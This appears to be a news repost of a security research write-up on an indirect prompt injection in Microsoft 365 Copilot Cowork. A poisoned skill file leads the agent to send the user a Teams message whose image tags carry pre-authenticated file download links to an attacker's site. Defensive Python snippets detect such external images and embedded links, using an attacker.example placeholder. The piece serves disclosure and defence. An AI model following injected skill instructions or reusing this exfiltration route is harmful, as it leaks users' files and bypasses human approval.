Tech News

Microsoft Copilot Cowork Exfiltrates Files

Why This Matters

This article highlights a significant security concern with Microsoft 365's Copilot Cowork feature, demonstrating how attackers can exploit prompt injection vulnerabilities to exfiltrate sensitive files and data. The findings underscore the importance of scrutinizing integrated AI systems that operate with broad permissions, as they can inadvertently expand attack surfaces and pose risks to enterprise data security. As AI-driven tools become more prevalent, understanding and mitigating these vulnerabilities is crucial for protecting user and organizational information.

Key Takeaways

This attack achieved a high success rate against state-of-the-art models, including Claude Opus 4.7.

Copilot Cowork is a Frontier feature available now in Microsoft 365. It operates with the user’s Microsoft permissions and can use Microsoft Graph to read and operate on data in the user’s Microsoft tenant.

In this article, we demonstrate that through an indirect prompt injection in a poisoned skill, attackers can exfiltrate files from M365. This is done by exploiting the fact that, unlike other sensitive actions, sending emails and Teams messages to the active user does not require human approval, and opening the compromised messages in Teams or Outlook can trigger attacker-controlled network requests.

This risk reflects that giving agents access to multiple systems expands the prompt-injection attack surface. In isolation, the agent’s intended capabilities are benign; however, due to the properties of the integrated systems, users are at risk. This is reminiscent of our previous work on how URL previews in communications apps have become an egress surface for agents. As this risk pertains to the design of a system in which agents act with delegated authority across an entire enterprise ecosystem, rather than to a specific bug, we are publicizing this work to inform users of the risks they are accepting by using an agentic product of this nature.

Separate from this risk, we have disclosed a vulnerability to Microsoft that directly allows data egress from Copilot Cowork’s sandbox environment.

Microsoft’s documentation on action approvals states, “[Copilot] Cowork asks for your permission before taking sensitive actions, like sending an email or posting a message in Teams.” However, in practice, when the recipient is the active user, these actions execute immediately without requiring human approval (users do not have a setting to modify this behavior). Because these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message sent by the agent. Copilot Cowork can retrieve ‘pre-authenticated download links’ for files the user has access to, which allow anyone who opens the link to download that file. So, a manipulated agent can exfiltrate files by exfiltrating pre-authenticated download links.
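Seen from the defensive side, the exposure described here comes down to a message body that loads images from hosts the reader never chose to contact. The following is a minimal sketch, assuming a filter can inspect a message's HTML before it is rendered; `external_image_sources`, the trusted-host set, and the example hosts are hypothetical and do not describe how Teams or Outlook actually process messages.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit


class _ImgCollector(HTMLParser):
    """Collects the src attribute of every <img> tag in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # Also invoked for self-closing tags such as <img ... />.
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.sources.append(value)


def external_image_sources(html, trusted_hosts):
    """Return image URLs whose host is not in trusted_hosts (hypothetical allowlist)."""
    collector = _ImgCollector()
    collector.feed(html)
    collector.close()

    flagged = []
    for src in collector.sources:
        try:
            host = urlsplit(src).hostname
        except ValueError:
            # Malformed URL: flag it rather than silently trusting it.
            flagged.append(src)
            continue
        # Sources without a host (cid:, data:, relative paths) make no external request.
        if host is not None and host not in trusted_hosts:
            flagged.append(src)
    return flagged


if __name__ == "__main__":
    body = (
        '<p>Weekly recap</p>'
        '<img src="https://attacker.example/p.png?u=abc">'
        '<img src="cid:logo">'
    )
    print(external_image_sources(body, {"res.trusted.example"}))
```

A filter of this kind only covers `<img>` tags; other elements that fetch remote resources would need the same treatment.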

The victim has access to files stored in SharePoint or OneDrive containing PII and financial data

The victim uploads a skill file to Copilot Cowork that contains a prompt injection. For general use cases, this is quite common: a user finds a file online and uploads it as a skill. The attack does not depend on the injection source; other sources include, but are not limited to, web data from Claude for Chrome and connected MCP servers. Note: Admins have limited oversight of ‘Skills’, as Skills in Copilot Cowork are automatically loaded from a specific path in a user’s OneDrive.

The victim asks Microsoft Copilot Cowork to review what they worked on that week, triggering the skill

The injection manipulates Microsoft Copilot Cowork to post a Teams message that will exfiltrate pre-authenticated file download links when it is viewed. The injection tells Copilot Cowork that a service exists to create document previews for the recap message; to use it, the agent retrieves a pre-authenticated download link for each file and passes those URLs as query parameters to an attacker-controlled site via malicious HTML image tags. At no point in this process is human approval required. If we expand the ‘Task complete’ block, we can see the agent’s actions play out, but the malicious message content is never visible, even when the Teams action is clicked on.
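The final step has a recognizable shape: a URL whose query parameters themselves carry full links. The following is a minimal detection sketch under that assumption; the function name `embedded_links` and the example hosts are hypothetical, and this is not a mitigation confirmed by the article or by Microsoft.

```python
from urllib.parse import parse_qsl, urlsplit


def embedded_links(url):
    """Return (parameter, value) pairs whose decoded value is itself an http(s) URL."""
    try:
        query = urlsplit(url).query
    except ValueError:
        return []

    hits = []
    # parse_qsl percent-decodes each value, so encoded links are caught as well.
    for name, value in parse_qsl(query, keep_blank_values=True):
        try:
            scheme = urlsplit(value).scheme
        except ValueError:
            continue
        if scheme in ("http", "https"):
            hits.append((name, value))
    return hits


if __name__ == "__main__":
    # Placeholder URL illustrating a link passed as a query parameter.
    image_url = (
        "https://attacker.example/preview"
        "?doc=https%3A%2F%2Ftenant.example%2Fdownload%3Fid%3D1&size=small"
    )
    for name, value in embedded_links(image_url):
        print(f"parameter {name!r} carries a link: {value}")
```

A check like this is a heuristic only: a link that has been encoded some other way (for example, base64) would pass unnoticed, which is why the lack of an approval step matters more than any single filter.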
